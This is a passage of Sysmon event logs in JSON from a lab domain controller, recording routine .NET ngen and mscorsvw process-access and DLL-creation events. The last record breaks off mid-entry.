{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.740\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-001050510F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.740","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-001050510F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-001050510F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-001050510F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-001050510F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-001050510F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:39.069\r\nProcessGuid: {41C8662E-228E-5F25-0000-001050510F00}\r\nProcessId: 3796\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ed4-0\\System.IO.Log.dll\r\nCreationUtcTime: 2020-08-01 08:06:39.069","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:39.069","ProcessGuid":"{41C8662E-228E-5F25-0000-001050510F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ed4-0\\System.IO.Log.dll","CreationUtcTime":"2020-08-01 08:06:39.069","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-0010AAF00E00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-0010AAF00E00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-0010AAF00E00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2282-5F25-0000-0010AAF00E00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.115\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-001076560F00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.115","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-001076560F00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.147\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-225D-5F25-0000-0010D4100E00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.147","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-225D-5F25-0000-0010D4100E00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.147\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-225D-5F25-0000-0010D4100E00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 